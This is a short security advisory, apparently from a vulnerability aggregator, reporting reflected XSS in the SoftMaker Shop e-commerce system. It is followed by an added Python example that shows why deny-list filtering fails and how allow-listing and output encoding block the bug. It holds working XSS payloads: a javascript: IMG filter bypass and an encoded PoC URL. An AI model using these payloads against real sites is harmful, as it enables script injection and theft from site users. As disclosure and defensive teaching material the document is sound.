Securityvulns: SECURITYVULNS:DOC:11276
Feb 03, 2006 - 12:00 a.m.

SoftMaker Shop is vulnerable to XSS

vulners.com

Inputs in the SoftMaker Shop are not properly sanitized, and XSS is possible in many of the system's input
fields and URL parameters.

Some fields are filtered in a basic way, so that simple scripting like
"<script>alert('XSS')</script>" is not possible. However, since the filtering is not based on whitelisting,
you can conduct successful XSS attacks with code like
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>".

PoC:
http://www.example.example/shop/handle/varer/sok/resultat.asp?strSok=%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E&valg=varer
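
The filtering gap described above, as an added example that is not part of the original advisory and not SoftMaker's code: it decodes the `strSok` value from the PoC URL, shows that a filter which only recognises `<script>` passes it unchanged, and contrasts that with allow-list validation and HTML encoding on output. The filter, the allow-list pattern and all function names are assumptions made for illustration; the advisory does not show the shop's actual filter.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# PoC URL as quoted in the advisory (placeholder host, as on the page).
POC_URL = (
    "http://www.example.example/shop/handle/varer/sok/resultat.asp"
    "?strSok=%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E"
    "&valg=varer"
)

# Assumed stand-in for the shop's filter: it only knows about <script>.
SCRIPT_BLOCK = re.compile(r"<\s*script\b.*?<\s*/\s*script\s*>", re.I | re.S)
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b[^>]*>", re.I)

# Assumed allow-list for a search term: word characters, space, hyphen, 1-64 chars.
ALLOWED_TERM = re.compile(r"[\w \-]{1,64}")


def search_term(url):
    """Return the decoded strSok query parameter, as the server would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["strSok"][0]


def blacklist_filter(value):
    """Deny-list approach: strips what it recognises, passes everything else."""
    return SCRIPT_TAG.sub("", SCRIPT_BLOCK.sub("", value))


def is_allowed(value):
    """Allow-list approach: accept only values made of known-good characters."""
    return ALLOWED_TERM.fullmatch(value) is not None


def render_result(value):
    """Encode on output so the browser treats the value as text, not markup."""
    return "<p>Results for: " + html.escape(value, quote=True) + "</p>"


if __name__ == "__main__":
    term = search_term(POC_URL)
    print("script tag  ->", repr(blacklist_filter("<script>alert('XSS')</script>")))
    print("PoC value   ->", repr(blacklist_filter(term)))
    print("allow-list  ->", is_allowed(term))
    print("encoded out ->", render_result(term))
```

Validation on input and encoding on output are complementary: the allow-list rejects the PoC value outright, and the encoding keeps any value that does reach the page inert.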

Vendor's site: http://www.softmaker.no

Please credit to: Preben Nyløkken